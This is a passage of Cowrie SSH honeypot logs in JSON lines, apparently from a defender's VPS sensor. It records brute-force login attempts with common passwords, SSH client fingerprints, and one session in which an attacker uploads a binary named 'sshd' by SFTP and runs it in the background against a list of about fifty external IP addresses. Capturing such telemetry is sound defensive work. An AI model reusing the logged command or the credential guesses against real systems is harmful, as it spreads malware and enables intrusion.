{"eventid":"cowrie.login.failed","username":"index","password":"changeme","message":"login attempt [index/changeme] failed","sensor":"my-vps","timestamp":"2025-08-28T09:45:53.976975Z","src_ip":"185.93.89.7","session":"af428fdcf546"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:45:54.996534Z","src_ip":"185.93.89.7","session":"af428fdcf546"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","shasum":"94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","sensor":"my-vps","timestamp":"2025-08-28T09:46:03.885646Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:46:04.120089Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.command.input","input":"chmod +x ./.8439449654653827479/sshd;nohup ./.8439449654653827479/sshd 78.107.31.92 45.207.201.42 175.47.180.25 60.165.127.100 88.209.249.106 91.99.186.181 103.145.145.82 47.96.158.82 223.75.204.39 43.247.68.87 62.60.232.169 83.168.95.48 163.172.34.113 185.231.181.100 157.255.155.179 113.7.221.72 47.94.87.144 60.165.126.250 62.210.130.180 180.178.189.2 160.19.205.25 1.195.60.11 89.163.135.163 176.120.17.70 200.106.249.210 101.36.109.45 94.182.147.147 96.78.175.36 178.239.157.250 23.229.82.50 89.233.193.146 117.149.247.143 103.126.172.10 8.135.238.15 5.75.206.212 107.150.121.86 111.20.120.70 154.89.201.181 5.167.76.48 1.62.252.20 103.28.53.102 31.97.158.25 45.149.207.114 159.203.90.99 62.72.1.151 124.225.88.88 167.86.78.165 23.146.184.59 110.49.99.110 14.103.158.69 5.189.157.5 &","message":"CMD: chmod +x ./.8439449654653827479/sshd;nohup ./.8439449654653827479/sshd 78.107.31.92 45.207.201.42 175.47.180.25 60.165.127.100 88.209.249.106 91.99.186.181 103.145.145.82 47.96.158.82 223.75.204.39 43.247.68.87 62.60.232.169 83.168.95.48 163.172.34.113 185.231.181.100 157.255.155.179 113.7.221.72 47.94.87.144 60.165.126.250 62.210.130.180 180.178.189.2 160.19.205.25 1.195.60.11 89.163.135.163 176.120.17.70 200.106.249.210 101.36.109.45 94.182.147.147 96.78.175.36 178.239.157.250 23.229.82.50 89.233.193.146 117.149.247.143 103.126.172.10 8.135.238.15 5.75.206.212 107.150.121.86 111.20.120.70 154.89.201.181 5.167.76.48 1.62.252.20 103.28.53.102 31.97.158.25 45.149.207.114 159.203.90.99 62.72.1.151 124.225.88.88 167.86.78.165 23.146.184.59 110.49.99.110 14.103.158.69 5.189.157.5 &","sensor":"my-vps","timestamp":"2025-08-28T09:46:04.120819Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/543ce1ee91798a6741a54dd42187a1ac3a1fbe1edb060cae36fc36bf01c00607","size":136,"shasum":"543ce1ee91798a6741a54dd42187a1ac3a1fbe1edb060cae36fc36bf01c00607","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/543ce1ee91798a6741a54dd42187a1ac3a1fbe1edb060cae36fc36bf01c00607 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:04.194322Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.session.closed","duration":"67.7","message":"Connection lost after 67.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:04.195879Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47150,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1e2d7cb66f1","protocol":"ssh","message":"New connection: 51.79.164.132:47150 (1.2.3.4:22) [session: a1e2d7cb66f1]","sensor":"my-vps","timestamp":"2025-08-28T09:46:07.069427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:46:07.494261Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:46:07.494992Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:46:10.509901Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:46:11.122171Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:46:11.122966Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:11.306969Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:11.308120Z","src_ip":"51.79.164.132","session":"a1e2d7cb66f1"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":32804,"dst_ip":"1.2.3.4","dst_port":22,"session":"c68d7ea04e19","protocol":"ssh","message":"New connection: 185.93.89.7:32804 (1.2.3.4:22) [session: c68d7ea04e19]","sensor":"my-vps","timestamp":"2025-08-28T09:46:20.095036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:46:20.096858Z","src_ip":"185.93.89.7","session":"c68d7ea04e19"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:46:20.168421Z","src_ip":"185.93.89.7","session":"c68d7ea04e19"}
{"eventid":"cowrie.login.failed","username":"index","password":"123456a","message":"login attempt [index/123456a] failed","sensor":"my-vps","timestamp":"2025-08-28T09:46:20.353429Z","src_ip":"185.93.89.7","session":"c68d7ea04e19"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:21.427653Z","src_ip":"185.93.89.7","session":"c68d7ea04e19"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":53934,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f03b01f669e","protocol":"ssh","message":"New connection: 51.79.164.132:53934 (1.2.3.4:22) [session: 1f03b01f669e]","sensor":"my-vps","timestamp":"2025-08-28T09:46:33.985923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:46:34.128891Z","src_ip":"51.79.164.132","session":"1f03b01f669e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:46:34.840133Z","src_ip":"51.79.164.132","session":"1f03b01f669e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:46:36.285993Z","src_ip":"51.79.164.132","session":"1f03b01f669e"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:37.729447Z","src_ip":"51.79.164.132","session":"1f03b01f669e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59124,"dst_ip":"1.2.3.4","dst_port":22,"session":"d71e513eec89","protocol":"ssh","message":"New connection: 185.93.89.7:59124 (1.2.3.4:22) [session: d71e513eec89]","sensor":"my-vps","timestamp":"2025-08-28T09:46:44.212069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:46:44.230617Z","src_ip":"185.93.89.7","session":"d71e513eec89"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:46:44.231496Z","src_ip":"185.93.89.7","session":"d71e513eec89"}
{"eventid":"cowrie.login.failed","username":"index","password":"abcdefgh","message":"login attempt [index/abcdefgh] failed","sensor":"my-vps","timestamp":"2025-08-28T09:46:44.432043Z","src_ip":"185.93.89.7","session":"d71e513eec89"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:46:45.452869Z","src_ip":"185.93.89.7","session":"d71e513eec89"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43938,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9e63792d617","protocol":"ssh","message":"New connection: 51.79.164.132:43938 (1.2.3.4:22) [session: e9e63792d617]","sensor":"my-vps","timestamp":"2025-08-28T09:47:00.799184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:47:01.224607Z","src_ip":"51.79.164.132","session":"e9e63792d617"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:47:01.263767Z","src_ip":"51.79.164.132","session":"e9e63792d617"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:47:03.141776Z","src_ip":"51.79.164.132","session":"e9e63792d617"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:47:04.562383Z","src_ip":"51.79.164.132","session":"e9e63792d617"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":34214,"dst_ip":"1.2.3.4","dst_port":22,"session":"12982292f5c0","protocol":"ssh","message":"New connection: 185.93.89.7:34214 (1.2.3.4:22) [session: 12982292f5c0]","sensor":"my-vps","timestamp":"2025-08-28T09:47:09.180587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:47:09.181762Z","src_ip":"185.93.89.7","session":"12982292f5c0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:47:09.199858Z","src_ip":"185.93.89.7","session":"12982292f5c0"}
{"eventid":"cowrie.login.failed","username":"index","password":"a1b2c3d4","message":"login attempt [index/a1b2c3d4] failed","sensor":"my-vps","timestamp":"2025-08-28T09:47:09.252529Z","src_ip":"185.93.89.7","session":"12982292f5c0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:47:10.273001Z","src_ip":"185.93.89.7","session":"12982292f5c0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33172,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e8a61f9de09","protocol":"ssh","message":"New connection: 51.79.164.132:33172 (1.2.3.4:22) [session: 9e8a61f9de09]","sensor":"my-vps","timestamp":"2025-08-28T09:47:27.232308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:47:27.485767Z","src_ip":"51.79.164.132","session":"9e8a61f9de09"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:47:27.487770Z","src_ip":"51.79.164.132","session":"9e8a61f9de09"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:47:30.285209Z","src_ip":"51.79.164.132","session":"9e8a61f9de09"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:47:31.572487Z","src_ip":"51.79.164.132","session":"9e8a61f9de09"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54026,"dst_ip":"1.2.3.4","dst_port":22,"session":"572a545a9bb0","protocol":"ssh","message":"New connection: 185.93.89.7:54026 (1.2.3.4:22) [session: 572a545a9bb0]","sensor":"my-vps","timestamp":"2025-08-28T09:47:33.743159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:47:33.750541Z","src_ip":"185.93.89.7","session":"572a545a9bb0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"ma